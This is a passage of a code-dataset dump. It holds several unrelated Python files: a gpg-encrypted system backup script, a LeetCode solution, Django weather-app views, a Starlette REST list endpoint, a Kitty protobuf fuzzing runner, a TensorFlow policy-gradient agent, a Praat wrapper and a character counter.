\"\"\"\n # self.rsyncfile = op.abspath(f)\n if not f:\n if DEBUG:\n print('rsync file empty =', f)\n s = self.name +'.' 
+self.type +'.rsync'\n f = op.join(self.backdir, s)\n p = op.abspath(f)\n if op.isfile(p):\n self.rsyncfile = p\n else:\n print('Not a valid file: ', f)\n sys.exit(1)\n\n def setTarDir(self, td):\n \"\"\" Set directory to store tarballs \"\"\"\n if not td:\n if DEBUG:\n print('tardir empty =', td)\n td = op.join(self.backdir, 'tarballs', self.name)\n p = op.abspath(td)\n if op.isfile(p):\n print('Error: {} already exists bit it\\'s a file', p)\n sys.exit(1)\n else:\n os.makedirs(p, exist_ok=True)\n self.tardir = p\n\n def setOutFile(self, of=''):\n \"\"\" Set output/target file \"\"\"\n if of:\n self.outfile = op.abspath(of)\n else:\n # no outfile --> default one\n d = dt.datetime.now()\n if self.type == 'daily':\n time = d.strftime(\"%d\")\n out = self.name +'.daily-{}.tar.xz.gpg'.format(time)\n elif self.type == 'weekly':\n time = d.strftime(\"%W\")\n out = self.name +'.weekly-{}.tar.xz.gpg'.format(time)\n elif self.type == 'monthly':\n # time = d.strftime(\"%B\").lower()\n time = d.strftime(\"%m\")\n out = self.name +'.monthly-{}.tar.xz.gpg'.format(time)\n else:\n print('Error: backup type {} not supported. Valid choices: {}'.format(self.type, types))\n sys.exit(1)\n\n self.outfile = op.join(self.tardir, out)\n\n def setUploadDir(self, ud):\n \"\"\" Set directory to upload tarballs \"\"\"\n if ud:\n p = op.abspath(ud)\n if op.isdir(p):\n self.uploaddir = p\n else:\n print('{} is not a valid directory.'.format(p))\n sys.exit(1)\n else:\n if DEBUG:\n print('upload dir empty =', ud)\n self.uploaddir = ''\n\n def rsync(self):\n \"\"\" Backup the files \"\"\"\n # s = '/usr/bin/rsync --archive --xattrs --verbose --delete --delete-excluded --human-readable --xattrs --partial --stats --filter={} / {}'.format(shlex.quote('\\\"merge {}\\\"'.format(self.rsyncfile)), op.join(self.backdir, self.name))\n s = '/usr/bin/rsync --archive --xattrs --verbose --delete --delete-excluded --human-readable --xattrs --partial --stats --filter={} / {}'.format(shlex.quote('merge {}'.format(self.rsyncfile)), op.join(self.backdir, self.name))\n cmd = shlex.split(s)\n out = self.exe(cmd)\n if DEBUG or VERBOSE:\n print('out= ', out)\n\n def save_dpkg(self):\n \"\"\" Save packages list \"\"\"\n if self.dpkg:\n s = '/usr/bin/dpkg --get-selections'\n cmd = shlex.split(s)\n outfile = op.join(self.backdir, self.name, 'dpkg.list')\n if DEBUG:\n print('outfile =', outfile)\n with open(outfile, 'w') as f:\n f.write(self.exe(cmd))\n\n def dump_mysql(self):\n \"\"\" Dump MYSQL databases; \"\"\"\n if self.mysql:\n # cmd = ['/usr/bin/mysqldump', '--all-databases']\n # dbs = ['mailserver','owncloud','phpmyadmin','roundcube','wpdb']\n for db in self.mysqldbs:\n cmd = ['/usr/bin/mysqldump', db]\n # outfile = /root/backuppa/backupdir/iperione/my.sql\n outfile = op.join(self.backdir, self.name, db +'.sql')\n if DEBUG:\n print('outfile =', outfile)\n with open(outfile, 'w') as f:\n print('Dumping db:', db)\n f.write(self.exe(cmd))\n\n def compress(self):\n \"\"\" Compress the backup \"\"\"\n # tar --create --sparse --xz --directory=$bkp $bkp/$host| gpg --batch --yes --verbose -z 0 --encrypt --recipient $rec --output $outfile\n # s = '/bin/tar --create --sparse --xz --directory={} {}'.format(self.backdir, op.join(self.backdir, self.name))\n # s = '/bin/tar --create --sparse --xz --directory={} .'.format(op.join(self.backdir, self.name))\n s = '/bin/tar --create --sparse --xz --directory={} {}'.format(self.backdir, self.name)\n cmd_tar = shlex.split(s)\n try:\n if DEBUG:\n print('Running command:', s)\n tar = subprocess.Popen(cmd_tar, 
stdout = subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)\n except (OSError, subprocess.CalledProcessError):\n print('Error while executing:', s)\n sys.exit(1)\n \n s = '/usr/bin/gpg --batch --yes --verbose -z 0 --encrypt --recipient {} --output {}'.format(self.key, self.outfile)\n cmd_gpg = shlex.split(s)\n try:\n if DEBUG:\n print('Running command:', s)\n gpg = subprocess.Popen(cmd_gpg, stdin = tar.stdout, stdout = subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)\n except (OSError, subprocess.CalledProcessError):\n print('Error while executing:', s)\n sys.exit(1)\n\n tar.stdout.close()\n out, err = gpg.communicate()\n if tar.poll() or gpg.poll():\n print('Error while executing pipe:\\ntar_cmd = {}\\ngpg_cmd = {}'.format(' '.join(cmd_tar), ' '.join(cmd_gpg)))\n sys.exit(1)\n\n if DEBUG:\n print('out:\\n{}\\n\\nerr:\\n{}'.format(out, err))\n\n def chgrp(self):\n \"\"\" Change group \"\"\"\n gid = grp.getgrnam(self.group).gr_gid\n if DEBUG:\n print('gid =', gid)\n os.chown(self.outfile, uid=-1, gid=gid)\n\n def upload(self):\n \"\"\" Upload backups somewhere using rsync \"\"\"\n # cmd = ['/usr/bin/rsync', '-avz', self.conf['tardir'], self.conf['upload']]\n s = '/usr/bin/rsync -avz {} {}'.format(self.tardir, self.uploaddir)\n cmd = shlex.split(s)\n out = self.exe(cmd)\n if DEBUG:\n print('out= ', out)\n\n def do_bkp(self):\n \"\"\" Do the actual backup \"\"\"\n \n pstr('backupping the main files')\n self.rsync()\n if self.dpkg:\n pstr('saving packages list')\n self.save_dpkg()\n if self.mysql:\n pstr('dumping MYSQL databases')\n self.dump_mysql()\n pstr('compressing backup to ' +self.outfile)\n self.compress()\n if self.group:\n pstr('changing file to group ' +self.group)\n self.chgrp()\n if self.uploaddir:\n pstr('uploading to ' +self.uploaddir)\n self.upload()\n\n def exe(self, cmd):\n \"\"\" Execute a command \"\"\"\n try:\n if DEBUG:\n print('Running command:', ' '.join(cmd))\n # wait()\n # output = subprocess.check_output(cmd).decode(\"utf-8\")\n exe = subprocess.run(cmd, check=True, stdout=subprocess.PIPE, universal_newlines=True)\n except (OSError, subprocess.CalledProcessError, UnicodeDecodeError) as e:\n print('Error while executing:', ' '.join(cmd))\n print('Error details:\\n', e)\n sys.exit(1)\n return exe.stdout\n \n\ndef wait():\n \"\"\" Wait user input \"\"\"\n try:\n input('Press a key to continue...')\n except (KeyboardInterrupt, EOFError):\n print('\\nExiting gracefully.')\n sys.exit(0)\n\ndef load_config():\n \"\"\" Load configuration file \"\"\"\n if DEBUG:\n # files = ['~/.backuppa.debug', '~/.backuppa.test', '~/.backuppa.conf', '/etc/backuppa.conf', '/usr/local/etc/backuppa.conf']\n files = ['~/.backuppa.debug', '~/.backuppa.test']\n else:\n files = ['~/.backuppa.conf', '/etc/backuppa.conf', '/usr/local/etc/backuppa.conf']\n for f in files:\n try:\n with open(op.expanduser(f)) as ymlfile:\n if DEBUG or VERBOSE:\n print('Found config file: {0}'.format(f))\n return yaml.safe_load(ymlfile)\n except FileNotFoundError:\n pass\n\ndef config_ok(d):\n \"\"\" Check config \"\"\"\n # Mandatory objects\n keys = ['baktype', 'backdir', 'key']\n for k in keys:\n try:\n if not d[k]:\n print('Option `{}\\' must be set'.format(k))\n return False\n except KeyError:\n print('Option `{}\\' must be set'.format(k))\n return False\n\n else:\n return True\n\ndef get_args():\n \"\"\" Parse command line arguments \"\"\"\n parser = argparse.ArgumentParser('Backuppa', description = 'Just another script to backup your system.', epilog = 'Mandatory arguments to long 
options are mandatory for short options too.')\n parser.add_argument('baktype', choices = ['daily', 'd', 'weekly', 'w', 'monthly', 'm'], help='Specify the type of backup (daily/weekly)')\n parser.add_argument('-n', '--name', help='Specify the name of the backup (i.e. the host name)')\n parser.add_argument('-b', '--backdir', help='Specify the main backup directory')\n parser.add_argument('-r', '--rsyncfile', help='Specify the rsync include file')\n parser.add_argument('-t', '--tardir', help='Specify where to store the tarballs')\n parser.add_argument('-o', '--outfile', help='Specify the output file (overrides --tardir)')\n parser.add_argument('-g', '--group', help='Specify the group the backups will be changed to')\n parser.add_argument('-k', '--key', help='Specify the GPG key to use to encript the backups')\n parser.add_argument('-u', '--uploaddir', help='Upload the backups to this location')\n parser.add_argument('-c', '--batch', action='store_true', help='Don\\'t wait for confirmation (mandatory for cron jobs)')\n parser.add_argument('-v', '--verbose', action='store_true', help='Be more verbose')\n parser.add_argument('-d', '--debug', action='store_true', help='Enable debug mode')\n args = parser.parse_args()\n if args.baktype == 'd':\n args.baktype = 'daily'\n elif args.baktype == 'w':\n args.baktype = 'weekly'\n elif args.baktype == 'm':\n args.baktype = 'monthly'\n # args = parser.parse_known_args()\n # print(args.tarball)\n return args\n##################### start here #####################\n\n\n# get arguments\nd_args = vars(get_args())\n\nif d_args['debug']:\n DEBUG = True\n del d_args['debug']\n pstr('DEBUG MODE')\n\nif d_args['verbose']:\n VERBOSE = True\n del d_args['verbose']\n\nif d_args['batch']:\n BATCH = True\n del d_args['batch']\n\n# Load config file\nld_args = load_config()\n\nif DEBUG:\n print('d_args =', d_args)\n print('ld_args=', ld_args)\n\nif not ld_args:\n print('WARNING: config file not found/empty!')\n ld_args = {}\n\nfor k in d_args:\n if d_args[k]:\n ld_args[k] = d_args[k]\n\nif DEBUG:\n print('ld_args=', ld_args)\n\npstr('Checking needed objects')\nif config_ok(ld_args):\n # bkp = Backuppa(name='titan', backdir='/home/mattia/tmp/var', group='adm', uploaddir='', dpkg=True, mysql=False, typ='daily', mysqldbs=['mailserver', 'wdp'], key='AF1EA4ED683D9FAB0CCD296015CC763466B7DC32')\n bkp = Backuppa(**ld_args)\n # bkp = Backuppa()\nelse:\n print('Some mondatory options are missing. Exiting.')\n sys.exit(1)\n\npstr('SUMMARY')\nprint(bkp)\n\nif not BATCH:\n wait()\n\nbkp.do_bkp()\n","sub_path":"Backuppa.py","file_name":"Backuppa.py","file_ext":"py","file_size_in_byte":14683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"116422217","text":"from typing import List\nfrom collections import OrderedDict\n# import pandas as pd\nclass Solution:\n def displayTable(self, orders: List[List[str]]) -> List[List[str]]:\n \"\"\"\n [\"David\",\"3\",\"Ceviche\"],[\"Corina\",\"10\",\"Beef Burrito\"],\n :param orders:\n :return:\n \"\"\"\n ret = OrderedDict()\n food_list = []\n table_list = []\n for order in orders:\n name, table, food = order[0], int(order[1]),order[2]\n ret[table] = ret.get(table, OrderedDict())\n ret[table][food] = ret[table].get(food, 0)+1\n food_list.append(food)\n table_list.append(table)\n food_list = list(set(food_list))\n table_list = list(set(table_list))\n food_list.sort()\n table_list.sort()\n\n result = []\n food_list.insert(0, 'Table')\n result.append(food_list)\n for table in table_list:\n temp = [f\"{table}\"]\n for food in food_list[1:]:\n temp.append(f\"{ret[table].get(food, 0)}\")\n result.append(temp)\n\n # print(ret)\n return result\n\nif __name__ == '__main__':\n s = Solution()\n ans = s.displayTable([[\"David\",\"3\",\"Ceviche\"],[\"Corina\",\"10\",\"Beef Burrito\"],[\"David\",\"3\",\"Fried Chicken\"],[\"Carla\",\"5\",\"Water\"],[\"Carla\",\"5\",\"Ceviche\"],[\"Rous\",\"3\",\"Ceviche\"]])\n print(ans)\n #\n orders = [[\"James\", \"12\", \"Fried Chicken\"], [\"Ratesh\", \"12\", \"Fried Chicken\"],\n [\"Amadeus\", \"12\", \"Fried Chicken\"], [\"Adam\", \"1\", \"Canadian Waffles\"],\n [\"Brianna\", \"1\", \"Canadian Waffles\"]]\n ans = s.displayTable(orders)\n print(ans)\n\n orders = [[\"Laura\", \"2\", \"Bean Burrito\"], [\"Jhon\", \"2\", \"Beef Burrito\"], [\"Melissa\", \"2\", \"Soda\"], [\"Laura\", \"2\", \"Bean Burrito\"]]\n ans = s.displayTable(orders)\n print(ans)","sub_path":"contests/week185/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"126796362","text":"# -*- coding: utf-8 -*-\nfrom django.shortcuts import render,redirect, get_object_or_404\nfrom django.http import HttpResponse,HttpResponseRedirect\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.forms import UserCreationForm, AuthenticationForm\nfrom django.template import RequestContext\nfrom django.contrib.auth.decorators import login_required\n\nfrom weather.forms import SearchForm,SigninForm, RegisterForm\nfrom weather.models import City, Forecast, UserProfile\n\nfrom datetime import date\nfrom tools.geoip_api import get_city_from_IP\nfrom tools import openweather_api\n# Create your views here.\ndef home(request):\n # ip_addr = request.META.get('HTTP_X_REAL_IP')\n # city_name = get_city_from_IP(ip_addr)\n city_name = request.COOKIES.get('city_name', '')\n if not city_name:\n city_name = 'Kiev'\n city = False\n try:\n city = City.objects.get(name__icontains=city_name)\n except:\n pass\n if not city:\n new_city = City.objects.create(name=city_name, population=0, country='-')\n info = openweather_api.parse_json_info(new_city.name)\n forecast = Forecast(city=new_city, temperature = info['temperature'], wind_speed = info['wind_speed'],\n weather_description = info['weather_description'], humidity = info['humidity'],\n pressure = info['pressure'])\n forecast.save()\n city = new_city\n forecasts = []\n try:\n forecasts = Forecast.objects.filter(city=city)[1:7]\n except:\n pass\n return render(request,'justweather/home.html', {'city': city, 'forecasts': forecasts})\n\ndef search(request):\n if request.method == 'GET':\n if 'city_name' in request.GET and request.GET['city_name']:\n form = SearchForm(request.GET)\n if form.is_valid():\n city_name = form.cleaned_data['city_name']\n city = City.objects.filter(name__icontains=city_name)\n if len(city) > 1:\n return render(request, 'justweather/search.html', {'cities_list': city, 'form': form})\n else:\n if city:\n forecasts=[]\n try:\n forecasts = Forecast.objects.filter(city=city)[1:7]\n except Exception:\n pass\n response = render(request, 'justweather/home.html', {'city': city[0], 'form': form, 'forecasts': forecasts})\n response.set_cookie('city_name', city_name)\n return response\n elif not form.is_valid():\n city = None\n return render(request, 'justweather/search.html', {'cities_list': city, 'form': form})\n cities_list = City.objects.order_by('-population')[0:16]\n form = SearchForm()\n return render(request, 'justweather/search.html', {'cities_list': cities_list, 'form': form})\n\ndef signin(request):\n if request.method == 'POST':\n form = SigninForm(request, {'username': request.POST.get('username'),\n 'password': request.POST.get('password')})\n if form.is_valid():\n user = form.get_user()\n if user:\n login(request, user)\n if not request.POST.get('remember-me', ''):\n request.session.set_expiry(0)\n return render(request, 'justweather/signin.html', {'form': form})\n return render(request, 'justweather/signin.html', {'form': form})\n return render(request, 'justweather/signin.html', {'usver': request.user})\n\n@login_required\ndef logout_view(request):\n logout(request)\n return HttpResponse('Successfully logged out! 
\\(^_^)/')\n\ndef registration_view(request):\n if request.method == 'POST':\n form = RegisterForm(request.POST)\n if form.is_valid():\n new_user = form.save()\n user = authenticate(username=form.cleaned_data['username'], password=form.cleaned_data['password1'])\n UserProfile.objects.create(user=user)\n login(request, user)\n return render(request, 'justweather/my_profile.html')\n else:\n return render(request, 'justweather/registration.html', {'form': form})\n else:\n form = RegisterForm()\n return render(request, 'justweather/registration.html', {'form': form})\n\n@login_required\ndef my_profile(request):\n return render(request, 'justweather/my_profile.html')\n\n@login_required\ndef my_places(request):\n return render(request, 'justweather/my_places.html')\n\n@login_required\ndef add_to_favorites(request, city_pk):\n city = get_object_or_404(City, pk=city_pk)\n request.user.userprofile.favorite_cities.add(city)\n return HttpResponse()\n\n@login_required\ndef del_from_favorites(request, city_pk):\n city = get_object_or_404(City, pk = city_pk)\n request.user.userprofile.favorite_cities.remove(city)\n return HttpResponse()\n\ndef search_ajax(request):\n if request.method == 'GET':\n if 'city_name' in request.GET and request.GET['city_name']:\n form = SearchForm(request.GET)\n if form.is_valid():\n city_name = form.cleaned_data['city_name']\n city = City.objects.filter(name__icontains=city_name)\n if not city:\n city=[]\n return render(request, 'justweather/search_options.html', {'cities_list': city})\n elif not form.is_valid():\n return render(request, 'justweather/search_options.html', {'form': form})","sub_path":"weather/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"114746583","text":"import json\nfrom sqlalchemy import desc, asc\nfrom starlette.endpoints import HTTPEndpoint\nfrom starlette.responses import JSONResponse\n\n\nclass ListResource(HTTPEndpoint):\n page = 1\n pages = 1\n limit = 10\n\n async def apply_filters(self):\n '''\n Apply filters for items\n example url site.com/api/users?filters=[\n {\"key\": \"nickname\", \"operator\": \"==\", \"value\": \"leonardo\"}\n ]\n '''\n\n filters = json.loads(\n self.request.query_params.get('filters', '[]'))\n\n for filter in filters:\n key = filter.get('key')\n value = filter.get('value')\n method = filter.get('operator')\n\n # start with helper\n if method == 'startWith':\n method = 'ilike'\n value = f'{value}%'\n\n column = getattr(self.model, key, None)\n operator = getattr(column, method, None)\n\n if operator:\n self.query = self.query.where(operator(value))\n\n if method == '==':\n self.query = self.query.where(column == value)\n if method == '>=':\n self.query = self.query.where(column >= value)\n if method == '>':\n self.query = self.query.where(column > value)\n if method == '<=':\n self.query = self.query.where(column <= value)\n if method == '<':\n self.query = self.query.where(column < value)\n if method == '!=':\n self.query = self.query.where(column != value)\n\n async def apply_paginate(self):\n pagination = json.loads(\n self.request.query_params.get(\n 'pagination',\n f'{{\"page\": 1, \"limit\": {self.limit} }}'))\n\n page = pagination.get('page')\n limit = pagination.get('limit')\n count = await self.db.func.count(self.model.id).gino.scalar()\n offset = (page - 1) * limit\n\n self.query = self.query.limit(limit).offset(offset)\n self.pages = count // limit\n if count % limit != 0:\n self.pages = self.pages + 1\n\n async def get(self, request):\n self.request = request\n self.query = self.model.query.order_by(asc(self.model.id))\n await self.apply_filters()\n await self.apply_paginate()\n\n items = await self.query.gino.all()\n\n return JSONResponse({\n 'success': True,\n 'items': self.schema(many=True).dump(items),\n 'pages': self.pages\n })\n\n async def post(self, request):\n\n data = await request.json()\n item = await self.model.create(**data)\n\n return JSONResponse({\n 'success': True,\n 'item': self.schema().dump(item)\n })\n","sub_path":"backend/app/core/api/list_resource.py","file_name":"list_resource.py","file_ext":"py","file_size_in_byte":2782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"1360534","text":"\"\"\"\nFiles involved:\n\nprotobuf_file_generator - initial tester to fuzz into binary\n /Users/balazsattila/Env/fuzz_framework/framework/services/protobuf_generator.py\n\nprotobuf_target - extend and refactor file target to handle protobuf binary message file\n /Users/balazsattila/Env/fuzz_framework/third_party/katnip/katnip/targets/protobuf.py\n\nprotobuf_template - templating system which can handle protobuf message creation\n /Users/balazsattila/Env/fuzz_framework/third_party/katnip/katnip/templates/protobuf.py\n\nprotobuf_runner - this file which will run the protobuf over HTTP\n /Users/balazsattila/Env/fuzz_framework/framework/bin/protobuf_runner.py\n\nprotobuf_controller - this control and lego the fuzzer process via Kitty/Katnip API\n /Users/balazsattila/Env/fuzz_framework/framework/controllers/protobuf/protobuf_controller.py\n\n\nArchitecture of Fuzzing according to Kitty API.:\n\n Fuzzer +--- Model *--- Template *--- Field\n |\n +--- Target +--- Controller\n | |\n | *--- Monitor\n |\n +--- Interface (WebInterface)\n\n\"\"\"\nimport time\nimport six\n\nfrom kitty.model import Template, GraphModel\nfrom kitty.fuzzers import ServerFuzzer\nfrom kitty.interfaces import WebInterface\n\nfrom framework.core.fuzz_object import FuzzObject\nfrom framework.services.parse_config import ConfigParser\nfrom framework.utils.utils import FrameworkUtils\nfrom framework.utils import ext_json\nfrom framework.controllers.protobuf.protobuf_controller import ProtobufController\nfrom framework.targets.protobuf_target import ProtobufTarget\n\n\nclass ProtobufRunner(FuzzObject):\n\n def __init__(self, pb2_api, name='ProtobufRunner', logger=None):\n super(ProtobufRunner, self).__init__(name, logger)\n self.pb2_api = pb2_api\n self.config = ConfigParser()\n self.target_host = self.config.get_target_host_name()\n self.target_port = self.config.get_target_port()\n self.frmu = FrameworkUtils()\n\n def run_proto(self) -> None:\n \"\"\"\n kitty low level field model\n https://kitty.readthedocs.io/en/latest/kitty.model.low_level.field.html\n \"\"\"\n\n js = ext_json.dict_to_JsonObject(dict(self.pb2_api[0]['Messages']), 'api')\n\n template_a = Template(name='Api', fields=js)\n\n self.logger.info(f\"[{time.strftime('%H:%M:%S')}] Prepare ProtobufTarget \")\n target = ProtobufTarget('ProtobufTarget',\n host=self.target_host,\n port=self.target_port,\n max_retries=10,\n timeout=None,\n pb2_module=self.pb2_api[1])\n\n self.logger.info(f\"[{time.strftime('%H:%M:%S')}] Prepare ProtobufController \")\n controller = ProtobufController('ProtobufController', host=self.target_host, port=self.target_port)\n target.set_controller(controller)\n #target.set_expect_response('true')\n self.logger.info(f\"[{time.strftime('%H:%M:%S')}] Defining GraphModel\")\n model = GraphModel()\n model.connect(template_a)\n\n self.logger.info(f\"[{time.strftime('%H:%M:%S')}] Prepare Server Fuzzer \")\n fuzzer = ServerFuzzer()\n fuzzer.set_interface(WebInterface(port=26001))\n fuzzer.set_model(model)\n fuzzer.set_target(target)\n fuzzer.start()\n self.logger.info(f\"[{time.strftime('%H:%M:%S')}] Start Fuzzer\")\n self.logger.info(f\"[Further info are in the related Kitty log output!]\")\n six.moves.input('press enter to exit')\n self.logger.info(f\"[{time.strftime('%H:%M:%S')}] End Fuzzer Session\")\n 
fuzzer.stop()\n","sub_path":"framework/runners/protobuf_runner.py","file_name":"protobuf_runner.py","file_ext":"py","file_size_in_byte":3668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"120749169","text":"import tensorflow as tf\nimport numpy as np\nfrom skimage import color, transform\n\n# TODO Build the policy gradient neural network\nclass Agent:\n def __init__(self, num_actions, state_size):\n initializer = tf.contrib.layers.xavier_initializer()\n\n self.input_layer = tf.placeholder(dtype=tf.float32, shape=[None, state_size[0], state_size[1], 1])\n # self.input_layer = tf.cast(self.input_layer, dtype=tf.float32)\n # self.input_layer = tf.reshape(self.input_layer, [None, 16, 8])\n '''self.input_layer = np.array(self.input_layer)\n print((self.input_layer))\n self.input_layer = self.input_layer.reshape(-1, 16, 8)'''\n # Neural net starts here\n '''conv_1 = tf.layers.conv2d(self.input_layer,\n filters=8,\n kernel_size=[4, 4],\n padding=\"same\",\n activation=tf.nn.relu, name=\"Conv1\")\n\npool_1 = tf.layers.max_pooling2d(conv_1,\n pool_size=[2, 2],\n strides=2, name=\"Pool1\")'''\n\n conv_2 = tf.layers.conv2d(self.input_layer,\n filters=4,\n kernel_size=[2, 2],\n padding=\"same\",\n activation=tf.nn.relu, name=\"Conv2\")\n\n pool_2 = tf.layers.max_pooling2d(conv_2,\n pool_size=[2, 2],\n strides=1, name=\"Pool2\")\n dropout0 = tf.layers.dropout(pool_2, rate=.5, training=True, name=\"Dropout_0\")\n flattenened_pooling = tf.layers.flatten(dropout0, name=\"Flatten\")\n hidden_layer = tf.layers.dense(flattenened_pooling,\n 6,\n activation=tf.nn.relu,\n kernel_initializer=initializer, name=\"A1\")\n dropout1 = tf.layers.dropout(hidden_layer, rate=.5, training=True, name=\"Dropout_1\")\n hidden_layer_2 = tf.layers.dense(dropout1, 6, activation=tf.nn.relu, kernel_initializer=initializer, name=\"A2\")\n dropout2 = tf.layers.dropout(hidden_layer_2, rate=.5, training=True, name=\"Dropout_2\")\n # Output of neural net\n out = tf.layers.dense(dropout2, num_actions, kernel_initializer=initializer, activation=None, name=\"Output\")\n\n self.outputs = tf.nn.softmax(out, name=\"Softmax_Output\")\n self.choice = tf.argmax(self.outputs, axis=1, name=\"Choice\")\n\n # Training Procedure\n self.rewards = tf.placeholder(shape=[None, ], dtype=tf.float32, name=\"Rewards\")\n self.actions = tf.placeholder(shape=[None, ], dtype=tf.int32, name=\"Actions\")\n\n one_hot_actions = tf.one_hot(self.actions, num_actions, name=\"One_Hot\")\n\n cross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits=out, labels=one_hot_actions, name=\"SoftCross\")\n\n self.loss = tf.reduce_mean(cross_entropy * self.rewards, name=\"Loss\")\n\n self.gradients = tf.gradients(self.loss, tf.trainable_variables(), name=\"Gradients\")\n\n # Create a placeholder list for gradients\n self.gradients_to_apply = []\n for index, variable in enumerate(tf.trainable_variables()):\n gradient_placeholder = tf.placeholder(tf.float32)\n self.gradients_to_apply.append(gradient_placeholder)\n\n # Create the operation to update gradients with the gradients placeholder.\n optimizer = tf.train.AdamOptimizer(learning_rate=1e-4, name=\"Optimizer\")\n self.update_gradients = optimizer.apply_gradients(zip(self.gradients_to_apply, tf.trainable_variables()))\n\n\nclass EnvironmentControl:\n discount_rate = 0.95\n\n def __init__(self, state_size, max_steps_in_episode, num_of_episode, episode_batch_size):\n self.state_size = state_size\n self.max_steps_in_episode = max_steps_in_episode\n self.num_of_episodes = num_of_episode\n self.episode_batch_size = episode_batch_size\n\n def resize_state(self, state):\n if state.shape[-1] == 1:\n return state\n return transform.rescale(color.rgb2gray(state), 1/4).reshape(-1, self.state_size[0], 
self.state_size[1], 1)\n\n\n def discount_normalize_rewards(self, rewards):\n discounted_rewards = np.zeros_like(rewards)\n total_rewards = 0\n\n for i in reversed(range(len(rewards))):\n total_rewards = total_rewards * self.discount_rate + rewards[i]\n discounted_rewards[i] = total_rewards\n\n discounted_rewards -= np.mean(discounted_rewards)\n discounted_rewards /= np.std(discounted_rewards)\n\n return discounted_rewards\n","sub_path":"model_mario.py","file_name":"model_mario.py","file_ext":"py","file_size_in_byte":4686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"212292175","text":"\nimport os\nimport sys\nfrom subprocess import Popen, PIPE\nimport re\n\nfrom acousticsim.representations.formants import Formants\nfrom acousticsim.representations.pitch import Pitch\nfrom acousticsim.representations.intensity import Intensity\nfrom acousticsim.representations.base import Representation\nfrom acousticsim.representations.mfcc import Mfcc, freq_to_mel\n\nfrom acousticsim.exceptions import AcousticSimPraatError\n\ndef to_pitch_praat(filepath, praatpath = None, time_step = 0.01, freq_lims = (75, 600), attributes = None):\n script = 'pitch.praat'\n if praatpath is None:\n praatpath = 'praat'\n if sys.platform == 'win32':\n praatpath.append('con.exe')\n listing = run_script(praatpath, script, filepath, time_step, freq_lims[0], freq_lims[1])\n output = Pitch(filepath, time_step, freq_lims, attributes = attributes)\n r = read_praat_out(listing)\n for k,v in r.items():\n r[k] = [v['Pitch']]\n output.rep = r\n return output\n\ndef to_formants_praat(filepath, praatpath = None, time_step = 0.01,\n win_len = 0.025, num_formants = 5, max_freq = 5000, attributes = None):\n script = 'formants.praat'\n listing = run_script(praatpath, script, filepath, time_step,\n win_len, num_formants, max_freq)\n output = Formants(filepath, max_freq, num_formants, win_len,\n time_step, attributes = attributes)\n r = read_praat_out(listing)\n for k,v in r.items():\n new_v = list()\n for i in range(1,num_formants+1):\n try:\n new_v.append((v['F%d'%i],v['B%d'%i]))\n except KeyError:\n new_v.append((None,None))\n r[k] = new_v\n output.rep = r\n return output\n\ndef to_intensity_praat(filepath, praatpath = None, time_step = 0.01, attributes = None):\n script = 'intensity.praat'\n listing = run_script(praatpath, script, filepath, time_step)\n output = Intensity(filepath, time_step, attributes = attributes)\n r = read_praat_out(listing)\n for k,v in r.items():\n r[k] = [v['Intensity']]\n output.rep = r\n return output\n\ndef to_mfcc_praat(filepath, praatpath = None, num_coeffs = 12,\n win_len = 0.025, time_step = 0.01, max_freq = 7800, use_power = False, attributes = None):\n script = 'mfcc.praat'\n listing = run_script(praatpath, script, filepath, num_coeffs, win_len, time_step, freq_to_mel(max_freq))\n output = Mfcc(filepath, (0,max_freq), num_coeffs, win_len, time_step,\n attributes = attributes, process = False)\n r = read_praat_out(listing)\n for k,v in r.items():\n r[k] = [v[k2] for k2 in sorted(v.keys())]\n output.rep = r\n\n return output\n\ndef run_script(praatpath, name, *args):\n script_dir = os.path.dirname(os.path.abspath(__file__))\n com = [praatpath]\n if praatpath.endswith('con.exe'):\n com += ['-a']\n com +=[os.path.join(script_dir,name)] + list(map(str,args))\n with Popen(com,stdout=PIPE,stderr=PIPE,stdin=PIPE) as p:\n try:\n text = str(p.stdout.read().decode('latin'))\n err = str(p.stderr.read().decode('latin'))\n except UnicodeDecodeError:\n print(p.stdout.read())\n print(p.stderr.read())\n if err:\n raise(AcousticSimPraatError(err))\n return text\n\ndef read_praat_out(text):\n if not text:\n return None\n lines = text.splitlines()\n head = None\n while head is None:\n try:\n l = lines.pop(0)\n except IndexError:\n print(text)\n raise\n if l.startswith('time'):\n head = re.sub('[(]\\w+[)]','',l)\n head = head.split(\"\\t\")[1:]\n output = {}\n for l in lines:\n if '\\t' in l:\n line = l.split(\"\\t\")\n time = line.pop(0)\n values = {}\n for j in range(len(line)):\n v = line[j]\n if v != '--undefined--':\n try:\n v = float(v)\n except ValueError:\n 
print(text)\n print(head)\n else:\n v = 0\n values[head[j]] = v\n if values:\n output[float(time)] = values\n return output\n","sub_path":"acousticsim/praat/wrapper.py","file_name":"wrapper.py","file_ext":"py","file_size_in_byte":4262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"528446231","text":"def count():\n file = input('masukkan file ber-ekstensi txt yang ingin dibuka: ')\n\n\n try:\n with open(file) as o:\n text = o.read()\n print(text)\n char = input('masukkan char yang ingin dihitung: ')\n hitung = 0\n\n for i in text:\n if i == char:\n hitung += 1\n print('jumlah huruf {0} pada {1} adalah {2}'.format(char, file, hitung))\n except:\n print('file text tidak ada didalam folder')\n\n\ncount()","sub_path":"ProjectR/SistemLogin/character.py","file_name":"character.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
